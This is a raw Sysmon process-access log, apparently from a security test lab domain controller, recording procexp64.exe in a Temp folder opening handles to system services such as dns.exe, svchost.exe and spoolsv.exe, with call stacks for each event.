\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785359Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785358Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785357Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785356Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785355Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785354Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785353Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785352Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785351Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785350Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785349Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785348Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785347Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785346Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785345Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785344Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785343Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785342Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE